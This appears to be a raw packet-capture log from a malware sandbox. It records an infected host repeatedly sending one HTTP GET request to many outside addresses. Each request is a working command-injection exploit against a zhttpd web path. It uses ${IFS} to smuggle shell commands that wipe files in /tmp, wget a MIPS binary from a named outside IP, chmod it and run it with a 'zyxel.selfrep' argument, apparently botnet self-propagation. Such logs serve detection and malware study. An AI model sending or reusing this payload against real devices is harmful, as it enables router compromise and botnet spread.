                                              Jan 29, 2024 07:04:06.327794075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8414192.168.2.1456420111.230.223.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327827930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8415192.168.2.144492695.223.82.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327867031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8416192.168.2.1453294196.117.161.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327905893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8417192.168.2.143937446.198.146.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327955008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8418192.168.2.1439564181.201.143.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327984095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8419192.168.2.1448868115.169.86.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328016996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8420192.168.2.1434730195.200.157.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328042030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8421192.168.2.1434146171.231.35.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328085899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8422192.168.2.145069467.159.134.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328142881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8423192.168.2.144751650.154.156.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328188896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8424192.168.2.1441414187.148.131.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328214884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8425192.168.2.144896234.163.68.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328270912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8426192.168.2.144904441.251.106.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328324080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8427192.168.2.1454160113.110.198.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328362942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8428192.168.2.145742241.161.118.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328376055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8429192.168.2.145943640.124.61.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328427076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8430192.168.2.1444050217.29.41.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328440905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8431192.168.2.1447428133.39.83.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328502893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8432192.168.2.1441708219.232.37.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328551054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8433192.168.2.1452500130.161.210.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328568935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8434192.168.2.143789679.28.167.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328635931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8435192.168.2.1446386122.253.145.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328635931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8436192.168.2.1439140103.140.53.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328661919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8437192.168.2.145717612.68.28.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328743935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8438192.168.2.1453156152.183.1.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328764915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8439192.168.2.143470093.171.51.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328799009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8440192.168.2.1448550154.42.38.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328833103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8441192.168.2.1447582107.13.105.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328861952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8442192.168.2.1459582116.71.197.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328929901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8443192.168.2.1442150132.53.205.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328959942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8444192.168.2.1459110171.237.82.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.328988075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8445192.168.2.144218832.12.198.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329025984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8446192.168.2.1457858143.47.156.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329049110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8447192.168.2.1449928128.102.77.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329104900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8448192.168.2.1438206199.224.222.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329145908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8449192.168.2.1459670206.186.183.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329176903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8450192.168.2.1441924122.201.234.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329222918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8451192.168.2.1432884156.158.114.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329257011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8452192.168.2.1444502163.94.15.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329304934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8453192.168.2.1459090149.70.28.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329350948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8454192.168.2.1455460139.138.6.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329369068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8455192.168.2.1458820172.124.32.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329406977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8456192.168.2.143326489.183.108.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329466105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8457192.168.2.1445440197.63.150.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329521894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8458192.168.2.1460580182.153.225.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329550982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8459192.168.2.145754658.43.65.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329586029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8460192.168.2.144111489.110.188.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329607010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8461192.168.2.145676831.84.10.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329643011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8462192.168.2.145814054.99.53.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329675913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8463192.168.2.1435830203.37.15.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329726934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8464192.168.2.144891861.11.83.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329757929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8465192.168.2.145045046.151.133.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329777002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8466192.168.2.1445636189.238.45.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329830885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8467192.168.2.145985662.123.255.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329879999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8468192.168.2.1460388204.102.68.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329905033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8469192.168.2.1455868165.89.248.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329937935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8470192.168.2.145849043.183.123.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.329989910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8471192.168.2.144587677.110.144.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330025911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8472192.168.2.145081683.99.130.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330066919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8473192.168.2.145107449.44.1.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330101013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8474192.168.2.1436362130.55.34.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330147982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8475192.168.2.144132479.0.34.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330184937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8476192.168.2.145034091.164.101.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330233097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8477192.168.2.1451802104.0.191.74443
                                              TimestampBytes transferredDirectionData
